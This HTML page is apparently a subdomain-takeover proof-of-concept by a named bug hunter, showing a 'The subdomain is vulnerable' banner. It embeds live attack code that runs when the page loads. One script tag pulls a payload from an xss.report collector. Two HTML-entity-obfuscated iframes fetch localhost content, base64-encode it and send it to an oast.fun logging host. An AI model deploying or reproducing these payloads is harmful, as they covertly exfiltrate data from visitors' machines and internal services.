<html>

<head>
  <link href="https://cdn.jsdelivr.net/npm/bootstrap@5.1.3/dist/css/bootstrap.min.css" rel="stylesheet" integrity="sha384-1BmE4kWBq78iYhFldvKuhfTAU6auU8tT94WrHftjDbrCEXSU1oBoqyl2QvZ6jIW3" crossorigin="anonymous">
  <title>Subdomain Takeover</title>
</head>

<body>
  <style>
    .page_404 {
      padding: 40px 0;
      background: #fff;
      font-family: 'Arvo', serif;
    }

    .page_404 img {
      width: 100%;
    }

    .four_zero_four_bg {
      background-image: url(https://cdn.dribbble.com/users/285475/screenshots/2083086/dribbble_1.gif);
      height: 400px;
      background-position: center;
    }

    .four_zero_four_bg h1 {
      font-size: 80px;
    }

    .four_zero_four_bg h3 {
      font-size: 80px;
    }

    .link_404 {
      color: #fff !important;
      padding: 10px 20px;
      background: #39ac31;
      margin: 20px 0;
      display: inline-block;
    }

    .contant_box_404 {
      margin-top: -50px;
    }
  </style>
  <section class="page_404">
    <div class="container">
      <div class="row">
        <div class="col-sm-12 ">
          <div class="">
            <div class="four_zero_four_bg">
              <h1 class="text-center">Subdomain Takeover</h1>

            </div>

            <div class="contant_box_404">
              <h3 class="h2 text-center">
                My name is ahmad zuriqi
              </h3>

              <p class="text-center">The subdomain is vulnerable</p>
         
               <script src=https://xss.report/c/ahmadzuriqi></script>  
<iframe srcdoc="&#60;&#115;&#99;&#114;&#105;&#112;&#116;&#62;&#102;&#101;&#116;&#99;&#104;&#40;&#39;&#104;&#116;&#116;&#112;&#58;&#47;&#47;&#108;&#111;&#99;&#97;&#108;&#104;&#111;&#115;&#116;&#47;&#39;&#41;&#46;&#116;&#104;&#101;&#110;&#40;&#114;&#101;&#115;&#112;&#111;&#110;&#115;&#101;&#32;&#61;&#62;&#32;&#114;&#101;&#115;&#112;&#111;&#110;&#115;&#101;&#46;&#116;&#101;&#120;&#116;&#40;&#41;&#41;&#46;&#116;&#104;&#101;&#110;&#40;&#100;&#97;&#116;&#97;&#32;&#61;&#62;&#32;&#98;&#116;&#111;&#97;&#40;&#100;&#97;&#116;&#97;&#41;&#41;&#46;&#116;&#104;&#101;&#110;&#40;&#101;&#110;&#99;&#111;&#100;&#101;&#100;&#68;&#97;&#116;&#97;&#32;&#61;&#62;&#32;&#102;&#101;&#116;&#99;&#104;&#40;&#39;&#104;&#116;&#116;&#112;&#58;&#47;&#47;&#102;&#99;&#121;&#101;&#115;&#122;&#121;&#122;&#112;&#106;&#106;&#97;&#101;&#112;&#103;&#118;&#116;&#120;&#100;&#102;&#108;&#121;&#121;&#48;&#48;&#57;&#114;&#57;&#50;&#119;&#108;&#117;&#115;&#46;&#111;&#97;&#115;&#116;&#46;&#102;&#117;&#110;&#47;&#108;&#111;&#103;&#63;&#100;&#97;&#116;&#97;&#61;&#39;&#32;+&#32;&#101;&#110;&#99;&#111;&#100;&#101;&#100;&#68;&#97;&#116;&#97;&#41;&#41;&#59;&#60;&#47;&#115;&#99;&#114;&#105;&#112;&#116;&#62;"></iframe>
 <iframe srcdoc="&#x3c;&#x73;&#x63;&#x72;&#x69;&#x70;&#x74;&#x3e;&#x66;&#x65;&#x74;&#x63;&#x68;&#x28;&#x27;&#x68;&#x74;&#x74;&#x70;&#x73;&#x3a;&#x2f;&#x2f;&#x6c;&#x6f;&#x63;&#x61;&#x6c;&#x68;&#x6f;&#x73;&#x74;&#x2f;&#x27;&#x29;&#x2e;&#x74;&#x68;&#x65;&#x6e;&#x28;&#x72;&#x65;&#x73;&#x70;&#x6f;&#x6e;&#x73;&#x65;&#x20;&#x3d;&#x3e;&#x20;&#x72;&#x65;&#x73;&#x70;&#x6f;&#x6e;&#x73;&#x65;&#x2e;&#x74;&#x65;&#x78;&#x74;&#x28;&#x29;&#x29;&#x2e;&#x74;&#x68;&#x65;&#x6e;&#x28;&#x64;&#x61;&#x74;&#x61;&#x20;&#x3d;&#x3e;&#x20;&#x62;&#x74;&#x6f;&#x61;&#x28;&#x64;&#x61;&#x74;&#x61;&#x29;&#x29;&#x2e;&#x74;&#x68;&#x65;&#x6e;&#x28;&#x65;&#x6e;&#x63;&#x6f;&#x64;&#x65;&#x64;&#x44;&#x61;&#x74;&#x61;&#x20;&#x3d;&#x3e;&#x20;&#x66;&#x65;&#x74;&#x63;&#x68;&#x28;&#x27;&#x68;&#x74;&#x74;&#x70;&#x73;&#x3a;&#x2f;&#x2f;&#x66;&#x63;&#x79;&#x65;&#x73;&#x7a;&#x79;&#x7a;&#x70;&#x6a;&#x6a;&#x61;&#x65;&#x70;&#x67;&#x76;&#x74;&#x78;&#x64;&#x66;&#x6c;&#x79;&#x79;&#x30;&#x30;&#x39;&#x72;&#x39;&#x32;&#x77;&#x6c;&#x75;&#x73;&#x2e;&#x6f;&#x61;&#x73;&#x74;&#x2e;&#x66;&#x75;&#x6e;&#x2f;&#x6c;&#x6f;&#x67;&#x3f;&#x64;&#x61;&#x74;&#x61;&#x3d;&#x27;&#x20;&#x2b;&#x20;&#x65;&#x6e;&#x63;&#x6f;&#x64;&#x65;&#x64;&#x44;&#x61;&#x74;&#x61;&#x29;&#x29;&#x3b;&#x3c;&#x2f;&#x73;&#x63;&#x72;&#x69;&#x70;&#x74;&#x3e;&#x0a;"></iframe>             
            </div>
          </div>
        </div>
      </div>
    </div>
  </section>
</body>

</html>
